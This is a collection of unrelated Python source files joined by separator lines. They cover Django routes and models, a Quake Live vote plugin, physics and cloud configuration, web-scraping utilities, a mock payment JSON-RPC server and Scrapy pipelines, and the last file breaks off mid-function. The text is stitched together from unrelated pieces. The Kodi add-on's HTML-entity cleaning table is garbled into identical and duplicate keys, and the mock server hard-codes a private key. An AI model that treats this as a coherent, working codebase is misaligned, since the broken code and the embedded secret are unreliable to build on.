    'nda_drug_table': {'database':'NDA_DPP_DMS', 'table':'lve.NDA_DRUG_E3_202021'},
    'ccg_map': {'database':'CASU_DIABETES', 'table':'core_map.LATEST_GP_CCG_map'},
    'hes_diabetes_table': {'database':'CASU_DIABETES', 'table':'dbo.HES_Diabetes_comps_1011to1920'},
    'imd_scores':{'database':'CASU_DIABETES', 'table':'ref.Deprivation_combined_EW_2019'},
    'data_size':'full', # only run the 'full' in 'RAP_TEMP' or 'lite' in the individual 'RAP_TEMP_**'
    'work_db':'RAP_TEMP',
}
|
from django.conf.urls import url
from django.views.generic import TemplateView
from flamingo import views
# URL routes for the flamingo app.
# NOTE(review): these regexes are anchored only at the start ('^', no '$'),
# so ordering matters — more specific patterns (e.g. ".../details/edit/")
# must stay above their shorter prefixes.
urlpatterns = [
    # Organisation routes.
    url(r'^org/search/', TemplateView.as_view(template_name='flamingo/organisations/org_search.html'),
        name='org-search'),
    url(r'^org/list/', views.OrgList.as_view(), name='org-list'),
    url(r'^org/(?P<pk>[0-9]+)/details/edit/', views.EditDetails.as_view(), name='org-details-edit'),
    url(r'^org/(?P<pk>[0-9]+)/details/', views.OrgDetails.as_view(), name='org-details'),
    url(r'^org/(?P<pk>[0-9]+)/users/search/', views.OrgUserSearch.as_view(), name='org-users-search'),
    url(r'^org/(?P<pk>[0-9]+)/users/list/', views.OrgUserList.as_view(), name='org-users-list'),
    url(r'^org/(?P<pk>[0-9]+)/members/add/', views.add_member, name='org-members-add'),
    url(r'^org/(?P<pk>[0-9]+)/members/', views.OrgMembers.as_view(), name='org-members'),
    url(r'^org/(?P<pk>[0-9]+)/member/(?P<member_pk>[0-9]+)/edit/', views.edit_member, name='org-member-edit'),
    url(r'^org/(?P<org_id>[0-9]+)/member/(?P<user_id>[0-9]+)/link/', views.link_user,
        name='org-member-link'),
    url(r'^org/(?P<org_id>[0-9]+)/member/(?P<member_id>[0-9]+)/delete/', views.UnlinkMember.as_view(),
        name='org-member-unlink'),
    url(r'^org/(?P<pk>[0-9]+)/member/(?P<member_pk>[0-9]+)/', views.MemberDetails.as_view(), name='org-member'),
    url(r'^org/(?P<pk>[0-9]+)/requirement/add/', views.add_requirement,
        name='org-requirement-add'),
    url(r'^org/(?P<pk>[0-9]+)/requirements/', views.OrgRequirements.as_view(),
        name='org-requirements'),
    url(r'^org/(?P<pk>[0-9]+)/requirement/(?P<requirement_pk>[0-9]+)/edit/', views.edit_requirement,
        name='org-requirement-edit'),
    url(r'^org/(?P<pk>[0-9]+)/requirement/(?P<requirement_pk>[0-9]+)/delete/', views.DeleteRequirement.as_view(),
        name='org-requirement-delete'),
    url(r'^org/(?P<pk>[0-9]+)/requirement/(?P<requirement_pk>[0-9]+)/', views.ViewRequirement.as_view(),
        name='org-requirement'),
    url(r'^org/(?P<pk>[0-9]+)/role/add/', views.add_role, name="org-role-add"),
    url(r'^org/(?P<pk>[0-9]+)/role/(?P<role_pk>[0-9]+)/edit/', views.edit_role, name="org-role-edit"),
    url(r'^org/(?P<pk>[0-9]+)/role/(?P<role_pk>[0-9]+)/delete/', views.DeleteRole.as_view(),
        name="org-role-delete"),
    url(r'^org/(?P<pk>[0-9]+)/role/(?P<role_pk>[0-9]+)/', views.ViewRole.as_view(), name="org-role"),
    url(r'^org/(?P<pk>[0-9]+)/roles/', views.ListRoles.as_view(), name="org-roles"),
    # User routes.
    url(r'^user/search/', TemplateView.as_view(template_name='flamingo/users/user_search.html'),
        name='user-search'),
    url(r'^user/list/', views.UserList.as_view(), name='user-list'),
    url(r'^user/(?P<pk>[0-9]+)/details/documents/(?P<document_pk>[0-9]+)/edit/', views.UserEditDocuments.as_view(),
        name='user-documents-edit'),
    url(r'^user/(?P<pk>[0-9]+)/details/documents/', views.UserDocuments.as_view(),
        name='user-documents'),
    url(r'^user/(?P<pk>[0-9]+)/details/edit/', views.UserEditDetails.as_view(), name='user-details-edit'),
    url(r'^user/(?P<pk>[0-9]+)/details/', views.UserDetails.as_view(), name='user-details'),
    # Curriculum routes.
    url(r'^curriculums/search/', TemplateView.as_view(template_name='flamingo/curriculums/curriculums_search.html'),
        name='curriculums-search'),
    url(r'^curriculums/list/', views.CurriculumList.as_view(), name='curriculums-list'),
    url(r'^curriculums/add/', views.CurriculumAdd.as_view(), name='curriculums-add'),
    url(r'^curriculums/(?P<pk>[0-9]+)/', views.CurriculumDetails.as_view(), name='curriculums-details'),
    # Course routes.
    url(r'^courses/search/', TemplateView.as_view(template_name='flamingo/courses/courses_search.html'),
        name='courses-search'),
    url(r'^courses/list/', views.CourseList.as_view(), name='courses-list'),
    url(r'^courses/add/', views.CourseAdd.as_view(), name='courses-add'),
    url(r'^courses/(?P<course_pk>[0-9]+)/edit/', views.CourseEdit.as_view(), name='courses-edit'),
    # Provider routes.
    url(r'^providers/search/', TemplateView.as_view(template_name='flamingo/providers/providers_search.html'),
        name='providers-search'),
    url(r'^providers/list/', views.ProviderList.as_view(), name='providers-list'),
    url(r'^providers/add/', views.ProviderAdd.as_view(), name='providers-add'),
    url(r'^providers/(?P<provider_pk>[0-9]+)/edit/', views.ProviderEdit.as_view(), name='providers-edit'),
]
|
# Created by Thomas Jones on 01/01/2016 - thomas@tomtecsolutions.com
# votestats.py - a minqlx plugin to show who votes yes or no in-game/vote results.
# This plugin is released to everyone, for any purpose. It comes with no warranty, no guarantee it works, it's released AS IS.
# You can modify everything, except for lines 1-4 and the !tomtec_versions code. They're there to indicate I whacked this together originally. Please make it better :D
"""
If you want to re-privatise votes, set the following cvar to 1: qlx_privatiseVotes
"""
import minqlx
class votestats(minqlx.Plugin):
    """minqlx plugin that announces who voted yes/no during callvotes and
    broadcasts the final tally.

    Players can toggle seeing the announcements with !votes; setting the
    cvar qlx_privatiseVotes to 1 disables the per-player announcements.
    """
    def __init__(self):
        self.add_hook("vote_started", self.vote_started, priority=minqlx.PRI_LOWEST)
        self.add_hook("vote", self.process_vote, priority=minqlx.PRI_LOWEST)
        self.add_hook("vote_ended", self.handle_vote_ended, priority=minqlx.PRI_LOWEST)
        self.add_command("votes", self.cmd_votes)
        self.add_command("tomtec_versions", self.cmd_showversion)
        self.set_cvar_once("qlx_privatiseVotes", "0")
        self.plugin_version = "1.9"
        # Players whose vote has already been announced this callvote.
        self.has_voted = []
    def vote_started(self, player, vote, args):
        """Reset the announced-voters list; the caller implicitly votes yes."""
        self.has_voted = []
        self.has_voted.append(player)
    def cmd_votes(self, player, msg, channel):
        """!votes — toggle whether this player sees vote announcements."""
        flag = self.db.get_flag(player, "votestats:votes_enabled", default=True)
        self.db.set_flag(player, "votestats:votes_enabled", not flag)
        if flag:
            word = "disabled"
        else:
            word = "enabled"
        player.tell("Player votes have been ^4{}^7.".format(word))
        return minqlx.RET_STOP_ALL
    def process_vote(self, player, yes):
        """Announce *player*'s yes/no vote to every player who opted in."""
        if self.get_cvar("qlx_privatiseVotes", bool):
            return
        if player in self.has_voted:
            return
        # Ignore spectator votes when the server does not count them.
        if not self.get_cvar("g_allowSpecVote", bool):
            if player.team == "spectator":
                return
        if yes:
            word = "^2yes"
        else:
            word = "^1no"
        for p in self.players():
            if self.db.get_flag(p, "votestats:votes_enabled", default=True):
                p.tell("{}^7 voted {}^7.".format(player.name, word))
        self.has_voted.append(player)
    def handle_vote_ended(self, votes, vote, args, passed):
        """Broadcast the final (yes, no) tally; for passed map votes, also
        announce the map (and optional game type) being changed to."""
        self.has_voted = []
        self.msg("Vote results: ^2{}^7 - ^1{}^7.".format(*votes))
        if passed:
            if vote.lower() == "map":
                changingToMapAndMode = args.lower().split()
                if len(changingToMapAndMode) > 1:
                    theMsg = "The map is changing to ^4{}^7, with new game type ^4{}^7.".format(changingToMapAndMode[0], changingToMapAndMode[1])
                else:
                    theMsg = "The map is changing to ^4{}^7.".format(changingToMapAndMode[0])
                self.msg(theMsg)
    def cmd_showversion(self, player, msg, channel):
        """!tomtec_versions — show this plugin's version string."""
        channel.reply("^4votestats.py^7 - version {}, created by Thomas Jones on 01/01/2016.".format(self.plugin_version))
|
import FWCore.ParameterSet.Config as cms
import os
# cmsRun configuration: print summaries of BeamSpot condition records via the
# BeamSpotRcdPrinter tool for a selected tag and IOV range.
process = cms.Process("summary")
# Route all MessageLogger output (down to DEBUG) to stdout.
process.MessageLogger = cms.Service( "MessageLogger",
                                     debugModules = cms.untracked.vstring( "*" ),
                                     cout = cms.untracked.PSet( threshold = cms.untracked.string( "DEBUG" ) ),
                                     destinations = cms.untracked.vstring( "cout" )
                                     )
# A single empty event is enough: the printer reads DB records, not event data.
process.maxEvents = cms.untracked.PSet(
    input = cms.untracked.int32(1)
)
process.source = cms.Source("EmptySource",
    numberEventsInRun = cms.untracked.uint32(1),
    firstRun = cms.untracked.uint32(1)
)
process.load("CondCore.CondDB.CondDB_cfi")
process.load("CondTools.BeamSpot.BeamSpotRcdPrinter_cfi")
# Exactly one of the tag/IOV sections below is active at a time; the others
# are kept commented out for convenient switching between datasets.
# NOTE(review): the start/end IOV integers appear to be packed run/lumi keys —
# confirm against the BeamSpotRcdPrinter documentation before editing them.
### 2018 Prompt
process.BeamSpotRcdPrinter.tagName = "BeamSpotObjects_PCL_byLumi_v0_prompt"
process.BeamSpotRcdPrinter.startIOV = 1350646955507767
process.BeamSpotRcdPrinter.endIOV = 1406876667347162
process.BeamSpotRcdPrinter.output = "summary2018_Prompt.txt"
### 2017 ReReco
#process.BeamSpotRcdPrinter.tagName = "BeamSpotObjects_LumiBased_v4_offline"
#process.BeamSpotRcdPrinter.startIOV = 1275820035276801
#process.BeamSpotRcdPrinter.endIOV = 1316235677532161
### 2018 ABC ReReco
#process.BeamSpotRcdPrinter.tagName = "BeamSpotObjects_LumiBased_v4_offline"
#process.BeamSpotRcdPrinter.startIOV = 1354018504835073
#process.BeamSpotRcdPrinter.endIOV = 1374668707594734
### 2018D Prompt
#process.BeamSpotRcdPrinter.tagName = "BeamSpotObjects_PCL_byLumi_v0_prompt"
#process.BeamSpotRcdPrinter.startIOV = 1377280047710242
#process.BeamSpotRcdPrinter.endIOV = 1406876667347162
process.p = cms.Path(process.BeamSpotRcdPrinter)
|
from ..utils import Object
class JsonValueObject(Object):
    """
    Represents a JSON object

    Attributes:
        ID (:obj:`str`): ``JsonValueObject``

    Args:
        members (List of :class:`telegram.api.types.jsonObjectMember`):
            The list of object members

    Returns:
        JsonValue

    Raises:
        :class:`telegram.Error`
    """
    ID = "jsonValueObject"

    def __init__(self, members, **kwargs):
        # List of jsonObjectMember instances; extra kwargs are ignored.
        self.members = members

    @staticmethod
    def read(q: dict, *args) -> "JsonValueObject":
        # Deserialize each raw member dict through the generic Object reader.
        parsed_members = []
        for raw_member in q.get('members', []):
            parsed_members.append(Object.read(raw_member))
        return JsonValueObject(parsed_members)
|
from django.db import models
from django.contrib.auth.models import AbstractUser
# Create your models here.
class User(AbstractUser):
    """Custom user model extending Django's ``AbstractUser``.

    Adds a gender flag, an optional age and a free-text description.
    """

    # DB value -> human-readable label.
    GENDER_CHOICE = (
        ("w", "woman"),
        ("M", "Man"),
        ("u", "unknown")
    )
    # Fix: the previous default "unkhow" exceeded max_length=1 and was not a
    # valid choice key; the correct default is the "unknown" key "u".
    gender = models.CharField(choices=GENDER_CHOICE, max_length=1, default="u")
    age = models.PositiveIntegerField(null=True)
    description = models.TextField(max_length=1000, blank=False)

    def __str__(self):
        return self.username
import jwt
import aiohttp
class EsiaError(Exception):
    """Base class for every error raised by this ESIA client."""
    pass
class IncorrectJsonError(EsiaError, ValueError):
    """A response body could not be parsed as JSON."""
    pass
class IncorrectMarkerError(EsiaError, jwt.InvalidTokenError):
    """A token ("marker") failed JWT validation."""
    pass
class HttpError(EsiaError, aiohttp.ClientError):
    """An HTTP request to the ESIA service failed."""
    pass
class OpenSSLError(EsiaError):
    """An OpenSSL signing/verification operation failed."""
    pass
|
from setuptools import setup
# Distribution metadata for the single-package `normalizer` module.
setup(name='normalizer',
      version='0.1',
      description='Very basic text normalization module',
      url='http://github.com/gpompe/basic_normalizer',
      author='Gaston Pompe',
      author_email='gastonpompe@gmail.com',
      license='MIT',
      packages=['normalizer'],
      # zip_safe=False so package data files stay accessible on disk.
      zip_safe=False,
      include_package_data=True
      )
|
# Copyright 2020 Google, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import requests
import json
import os
def handle_newfile(data, context):
    """Background Cloud Function to be triggered by Cloud Storage.
    This generic function calls the Cloud Run URL endpoint.
    Args:
        data (dict): The Cloud Functions event payload.
        context (google.cloud.functions.Context): Metadata of triggering event.
    Returns:
        None; the output is written to Stackdriver Logging
    """
    # Notes:
    # (1) Ideally, we can simply invoke mlp_babyweight.finetune from here.
    #     However, kfp.Client() has dependencies on binaries that are not
    #     available in Cloud Functions, hence this workaround of putting
    #     mlp_babyweight.py in a Docker container and invoking it via Cloud Run.
    # (2) We could reduce the traffic to Cloud Run by checking the filename
    #     pattern here, but for reusability and maintainability reasons this
    #     Cloud Function stays a simple pass-through.
    payload = {
        'bucket': data['bucket'],
        'filename': data['name']
    }

    # Receiving service url.
    url = os.environ.get('DESTINATION_URL', "No DESTINATION_URL")
    print("Invoking Cloud Run at {} with {}".format(url, payload))

    # Fetch an identity token for the target audience from the metadata server.
    # See https://cloud.google.com/run/docs/authenticating/service-to-service
    metadata_server_token_url = 'http://metadata/computeMetadata/v1/instance/service-accounts/default/identity?audience='
    token_response = requests.get(
        metadata_server_token_url + url,
        headers={'Metadata-Flavor': 'Google'})
    id_token = token_response.content.decode("utf-8")

    # Provide the token in the request to the receiving service.
    headers = {
        'Authorization': f'bearer {id_token}',
        'Content-Type': 'application/json'
    }
    print("Headers = {}".format(headers))
    resp = requests.post(url, data=json.dumps(payload), headers=headers)
    return resp.status_code == requests.codes.ok
|
# -*- coding: utf-8 -*-
"""
This file contains web utilities
Classes:
download_tools() -> Contains a downloader, a extraction function and a remove function
Functions:
get_page_source -> Get a webpage source code through urllib2
mechanize_browser(url) -> Get a webpage source code through mechanize module. To avoid DDOS protections.
makeRequest(url, headers=None) -> check if a page is up and retrieve its source code
clean(text) -> Remove specific characters from the page source
url_isup(url, headers=None) -> Check if url is up. Returns True or False.
"""
import xbmc,xbmcplugin,xbmcgui,xbmcaddon,urllib,urllib2,tarfile,os,sys,re
user_agent = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36'
class download_tools():
    """Kodi helpers: download with a progress dialog, extract a tar, remove a file.

    NOTE(review): `translate` used below is assumed to come from the add-on's
    localisation helpers elsewhere in the add-on — confirm it is in scope.
    """
    def Downloader(self,url,dest,description,heading):
        # Download `url` to `dest`, reporting progress via a Kodi dialog.
        dp = xbmcgui.DialogProgress()
        dp.create(heading,description,'')
        dp.update(0)
        # urlretrieve reports (block count, block size, total size) to the hook.
        urllib.urlretrieve(url,dest,lambda nb, bs, fs, url=url: self._pbhook(nb,bs,fs,dp))
    def _pbhook(self,numblocks, blocksize, filesize,dp=None):
        # Progress callback: compute percent done; fall back to 100 when the
        # server did not provide a total size (filesize <= 0 raises here).
        try:
            percent = int((int(numblocks)*int(blocksize)*100)/int(filesize))
            dp.update(percent)
        except:
            percent = 100
            dp.update(percent)
        # Close the dialog if the user pressed cancel (download itself continues).
        if dp.iscanceled():
            dp.close()
    def extract(self,file_tar,destination):
        # Extract a tar archive into `destination`, showing a simple dialog.
        dp = xbmcgui.DialogProgress()
        dp.create(translate(40000),translate(40044))
        tar = tarfile.open(file_tar)
        tar.extractall(destination)
        dp.update(100)
        tar.close()
        dp.close()
    def remove(self,file_):
        # Delete a file, showing a brief progress dialog.
        dp = xbmcgui.DialogProgress()
        dp.create(translate(40000),translate(40045))
        os.remove(file_)
        dp.update(100)
        dp.close()
def get_page_source(url):
    """Fetch *url* with the module's desktop User-Agent and return the body."""
    request = urllib2.Request(url)
    request.add_header('User-Agent', user_agent)
    page = urllib2.urlopen(request)
    source = page.read()
    page.close()
    return source
def mechanize_browser(url):
    """Fetch *url* through mechanize (handles redirects/referers) to get past
    simple anti-bot protections; returns the page source."""
    import mechanize
    br = mechanize.Browser()
    br.set_handle_equiv(True)
    br.set_handle_redirect(True)
    br.set_handle_referer(True)
    br.set_handle_robots(True)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    r = br.open(url)
    # NOTE(review): `html` below is unused and the response is read twice;
    # presumably harmless with mechanize's seekable responses — verify.
    html = r.read()
    html_source= br.response().read()
    return html_source
def makeRequest(url, headers=None):
    """Fetch *url* and return the raw response body.

    On any fetch error an error dialog is shown and the add-on exits.

    :param url: address to fetch.
    :param headers: optional dict of HTTP headers; a default desktop
        User-Agent is used when omitted.
    """
    try:
        if not headers:
            headers = {'User-agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0'}
        req = urllib2.Request(url,None,headers)
        response = urllib2.urlopen(req)
        data = response.read()
        response.close()
        return data
    except Exception:
        # Fix: narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
        # are not swallowed; any fetch error still shows the dialog and exits.
        mensagemok(translate(40000),translate(40122))
        sys.exit(0)
def url_isup(url, headers=None):
    """Check if url is up. Returns True or False.

    :param url: address to probe.
    :param headers: optional dict of HTTP headers; a default desktop
        User-Agent is used when omitted.
    """
    try:
        if not headers:
            headers = {'User-agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0'}
        req = urllib2.Request(url,None,headers)
        response = urllib2.urlopen(req)
        data = response.read()
        response.close()
        return True
    except Exception:
        # Fix: narrowed from a bare `except:` — a deliberate best-effort probe,
        # but SystemExit/KeyboardInterrupt should not be treated as "down".
        return False
def clean(text):
    """Strip layout control characters and decode common HTML entities in *text*."""
    # Insertion order matters: '&170;' must be tried before the bare '&'
    # entity, so the mapping below must not be reordered.
    replacements = {'\r':'','\n':'','\t':'',' ':' ','"':'"',''':'',''':"'",'ã':'ã','&170;':'ª','é':'é','ç':'ç','ó':'ó','â':'â','ñ':'ñ','á':'á','í':'í','õ':'õ','É':'É','ú':'ú','&':'&','Á':'Á','Ã':'Ã','Ê':'Ê','Ç':'Ç','Ó':'Ó','Õ':'Õ','Ô':'Ó','Ú':'Ú'}
    entity_re = re.compile("|".join(map(re.escape, replacements.keys())))
    def _swap(match):
        return replacements[match.group(0)]
    return entity_re.sub(_swap, text)
|
from setuptools import setup
# Distribution metadata for the gpe3d_mpi_nlt analysis package.
setup(name='gpe3d_mpi_nlt',
      version='0.1',
      description='Provides methods to analyze 3D GPE simulations run using gpe3d_nlt_mpi',
      url='https://github.com/shreyaspotnis/gpe3d_mpi_nlt',
      author='Shreyas Potnis',
      author_email='shreyaspotnis@gmail.com',
      license='MIT',
      packages=['gpe3d_mpi_nlt'],
      zip_safe=False)
|
import time
from werkzeug.serving import run_simple
from werkzeug.wrappers import Request, Response
from jsonrpc import JSONRPCResponseManager, dispatcher
from multiprocessing import Process
from picopayments_cli import auth
@dispatcher.add_method
def mph_sync(**kwargs):
    # Mock endpoint: verify the caller's auth signature, then return a signed
    # dummy payload so clients can exercise their verification path.
    auth.verify_json(kwargs)
    # NOTE(review): hard-coded WIF key — test fixture only, do not reuse.
    auth_wif = "cT9pEqELRn5v67hJmmmYQmPnsuezJeup7CqQiJBUTZnLLoxdydAb"
    return auth.sign_json({"foo": "bar"}, auth_wif)
@Request.application
def _application(request):
    # Dispatch the raw JSON-RPC request body to registered methods and
    # wrap the manager's reply as an HTTP JSON response.
    response = JSONRPCResponseManager.handle(request.data, dispatcher)
    return Response(response.json, mimetype='application/json')
def start(host='127.0.0.1', port=16000, startup_delay=5):
    """Launch the mock JSON-RPC server in a child process.

    Backward compatible: called with no arguments it behaves exactly as
    before (binds 127.0.0.1:16000 and waits 5 seconds).

    :param host: interface to bind.
    :param port: TCP port to listen on.
    :param startup_delay: seconds to wait for the server to come up.
    :return: the started ``multiprocessing.Process``; the caller is
        responsible for terminating it.
    """
    process = Process(
        target=run_simple,
        args=(host, port, _application),
        kwargs=dict(processes=1, ssl_context='adhoc')
    )
    process.start()
    # Crude readiness wait; ad-hoc SSL certificate generation can be slow.
    time.sleep(startup_delay)
    return process
if __name__ == "__main__":
    # Run the server in the foreground with the same parameters start() uses.
    run_simple(
        *('127.0.0.1', 16000, _application),
        **dict(processes=1, ssl_context='adhoc')
    )
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command for updating target SSL proxies."""
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.core import apis as core_apis
class Update(base_classes.NoOutputAsyncMutator):
  """Update a target SSL proxy.

  Builds up to three sub-requests (SetSslCertificates, SetBackendService,
  SetProxyHeader), one per flag supplied on the command line.
  """

  @staticmethod
  def Args(parser):
    """Register the command's flags and positional argument."""
    # TODO(user) This probably shouldn't be a mutualy exclusive
    # group the service falls over when two update requests come in
    # as part of the same batch request. See b/18760514.
    group = parser.add_mutually_exclusive_group()
    ssl_certificate = group.add_argument(
        '--ssl-certificate',
        help=('A reference to an SSL certificate resource that is used for '
              'server-side authentication.'))
    ssl_certificate.detailed_help = """\
        A reference to an SSL certificate resource that is used for
        server-side authentication. The SSL certificate must exist and cannot
        be deleted while referenced by a target SSL proxy.
        """
    backend_service = parser.add_argument(
        '--backend-service',
        # Typo fix: was 'target SSLproxy.'
        help=('A backend service that will be used for connections to the '
              'target SSL proxy.'))
    backend_service.detailed_help = """\
        A backend service that will be used for connections to the target SSL
        proxy.
        """
    messages = core_apis.GetMessagesModule('compute', 'alpha')
    proxy_header_options = sorted(messages.TargetSslProxy
                                  .ProxyHeaderValueValuesEnum.to_dict().keys())
    proxy_header = parser.add_argument(
        '--proxy-header',
        choices=proxy_header_options,
        help=('Proxy header format.'))
    proxy_header.detailed_help = """\
        Format of the proxy header that the balancer will send when creating new
        backend connections. Valid options are: NONE and PROXY_V1.
        """
    parser.add_argument(
        'name',
        completion_resource='TargetSslProxies',
        help='The name of the target SSL proxy.')

  @property
  def service(self):
    return self.compute.targetSslProxies

  @property
  def method(self):
    # Not a single-method mutator: CreateRequests names the verb per request.
    pass

  @property
  def resource_type(self):
    # Bug fix: previously returned 'targetHttpProxies' (copy/paste from the
    # HTTP proxy command); this command operates on target SSL proxies.
    return 'targetSslProxies'

  def CreateRequests(self, args):
    """Build the list of (verb, request) tuples for the requested updates.

    Raises:
      exceptions.ToolException: if no update flag was supplied.
    """
    if not (args.ssl_certificate or args.proxy_header or args.backend_service):
      raise exceptions.ToolException(
          'You must specify at least one of [--ssl-certificate], '
          '[--backend-service] or [--proxy-header].')
    requests = []
    target_ssl_proxy_ref = self.CreateGlobalReference(
        args.name, resource_type='targetSslProxies')
    if args.ssl_certificate:
      ssl_certificate_ref = self.CreateGlobalReference(
          args.ssl_certificate, resource_type='sslCertificates')
      requests.append(
          ('SetSslCertificates',
           self.messages.ComputeTargetSslProxiesSetSslCertificatesRequest(
               project=self.project,
               targetSslProxy=target_ssl_proxy_ref.Name(),
               targetSslProxiesSetSslCertificatesRequest=(
                   self.messages.TargetSslProxiesSetSslCertificatesRequest(
                       sslCertificates=[ssl_certificate_ref.SelfLink()])))))
    if args.backend_service:
      backend_service_ref = self.CreateGlobalReference(
          args.backend_service, resource_type='backendServices')
      requests.append(
          ('SetBackendService',
           self.messages.ComputeTargetSslProxiesSetBackendServiceRequest(
               project=self.project,
               targetSslProxy=target_ssl_proxy_ref.Name(),
               targetSslProxiesSetBackendServiceRequest=(
                   self.messages.TargetSslProxiesSetBackendServiceRequest(
                       service=backend_service_ref.SelfLink())))))
    if args.proxy_header:
      proxy_header = (self.messages.TargetSslProxiesSetProxyHeaderRequest.
                      ProxyHeaderValueValuesEnum(args.proxy_header))
      requests.append(
          ('SetProxyHeader',
           self.messages.ComputeTargetSslProxiesSetProxyHeaderRequest(
               project=self.project,
               targetSslProxy=target_ssl_proxy_ref.Name(),
               targetSslProxiesSetProxyHeaderRequest=(
                   self.messages.TargetSslProxiesSetProxyHeaderRequest(
                       proxyHeader=proxy_header)))))
    return requests
Update.detailed_help = {
'brief': 'Update a target SSL proxy',
'DESCRIPTION': """\
*{command}* is used to change the SSL certificate, backend
service or proxy header of existing target SSL proxies. A
target SSL proxy is referenced by one or more forwarding rules
which define which packets the proxy is responsible for
routing. The target SSL proxy in turn points to a backend
service which will handle the requests. The target SSL proxy
also points to an SSL certificate used for server-side
authentication. """,
}
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import pymongo
import json
class IllustriousPipeline(object):
    """Default no-op pipeline: passes every item through unchanged."""
    def process_item(self, item, spider):
        return item
class MongoPipeline(object):
    """Persist scraped items into MongoDB, one collection per item type.

    Items are upserted keyed on their natural identifiers, so re-crawls
    update existing documents instead of duplicating them.
    """

    # Item class name -> (collection name, fields forming the upsert key).
    UPSERT_RULES = {
        'ProblemItem': ('problems', ('oj', 'problem_id')),
        'SolutionItem': ('status', ('oj', 'run_id')),
        'AccountItem': ('users', ('oj', 'username')),
    }

    def __init__(self, mongo_uri, mongo_db):
        self.mongo_uri = mongo_uri
        self.mongo_db = mongo_db

    @classmethod
    def from_crawler(cls, crawler):
        # Read connection settings from the Scrapy project configuration.
        return cls(
            mongo_uri=crawler.settings.get('MONGO_URI'),
            mongo_db=crawler.settings.get('MONGO_DATABASE')
        )

    def open_spider(self, spider):
        self.client = pymongo.MongoClient(self.mongo_uri)
        self.db = self.client[self.mongo_db]

    def close_spider(self, spider):
        self.client.close()

    def process_item(self, item, spider):
        """Upsert *item* into its collection; unknown item types pass through."""
        rule = self.UPSERT_RULES.get(item.__class__.__name__)
        if rule is not None:
            collection, key_fields = rule
            query = {field: item[field] for field in key_fields}
            # Fix: replace_one(..., upsert=True) supersedes the deprecated
            # Collection.update() used before (removed in PyMongo 4); like the
            # old call it replaces the whole matched document.
            self.db[collection].replace_one(query, dict(item), upsert=True)
        return item
class JsonWriterPipeline(object):
    """Append every scraped item to ``items.jl`` as one JSON object per line."""

    def __init__(self):
        # Fix: open in text mode — json.dumps returns str, and writing str
        # to a file opened 'wb' raises TypeError on Python 3.
        self.file = open('items.jl', 'w')

    def close_spider(self, spider):
        # Fix: close the file when the spider finishes so buffered lines
        # reach disk (the file was previously never closed).
        self.file.close()

    def process_item(self, item, spider):
        line = json.dumps(dict(item)) + "\n"
        self.file.write(line)
        return item
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Setup file for application installation.
"""
from setuptools import (
find_packages,
setup,
)
#
# Configuration
#
# Packages included in the distribution: the app package and all subpackages.
PACKAGES = [
    'app',
    'app.*',
]
PYTHON_REQUIRES = ">=3.8"
# Runtime dependencies (FastAPI web stack, auth, DB and CLI tooling).
REQUIRES = [
    "click",
    "email-validator",
    "emails",
    "fastapi",
    "orjson",
    "passlib[bcrypt]",
    "pydantic",
    "python-jose[cryptography]",
    "python-multipart",
    "sqlalchemy",
    "tenacity",
    "uvicorn",
]
# Optional extras: `pip install app[postgres]` adds the PostgreSQL driver.
EXTRAS_REQUIRE = {
    "postgres": ["psycopg2-binary"],
}
# Console entry point: installs an `app` command mapped to app.cli.core:main.
ENTRY_POINTS = {
    "console_scripts": [
        "app=app.cli.core:main",
    ]
}
#
# Setup
#
setup(
    name='app',
    packages=find_packages(include=PACKAGES),
    python_requires=PYTHON_REQUIRES,
    install_requires=REQUIRES,
    extras_require=EXTRAS_REQUIRE,
    entry_points=ENTRY_POINTS,
    test_suite="tests",
    include_package_data=True,
    zip_safe=False,
)
|
import argparse as ap
import math
import multiprocessing as mp
import networkx as nx
import utils
from seed_based_main import seed_based_mapping
def compute_init_seed(i1, N, m, d1, deg2, deg2_len, g1, g2):
    """Score g1 node ``m`` against every candidate in ``deg2`` from g2 and
    return the best-matching pair with its similarity score.

    :param i1: 1-based index of this task (progress printing only)
    :param N: total number of tasks (progress printing only)
    :param m: the g1 node being matched
    :param d1: degree of ``m`` in g1
    :param deg2: list of (node, degree) candidates from g2
    :param deg2_len: len(deg2) (progress printing only)
    :param g1: first graph
    :param g2: second graph
    :return: ((m, n), score) for the highest-scoring candidate n
    """
    print(f'From g1 {i1}/{N}')
    # 1-, 2- and 3-hop neighbourhoods of m and their induced edge counts.
    g1_nbrs1 = utils.knbrs(g1, m, 1)
    # NOTE(review): the +1 here (presumably counting m itself) has no
    # counterpart in the g2 side below — confirm the asymmetry is intended.
    g1_nbrs1_len = len(g1_nbrs1) + 1
    g1_nbrs1_edge_len = g1.subgraph(g1_nbrs1).number_of_edges()
    g1_nbrs2 = utils.knbrs(g1, m, 2)
    g1_nbrs2_len = len(g1_nbrs2)
    g1_nbrs2_only = set(g1_nbrs2) - set(g1_nbrs1)
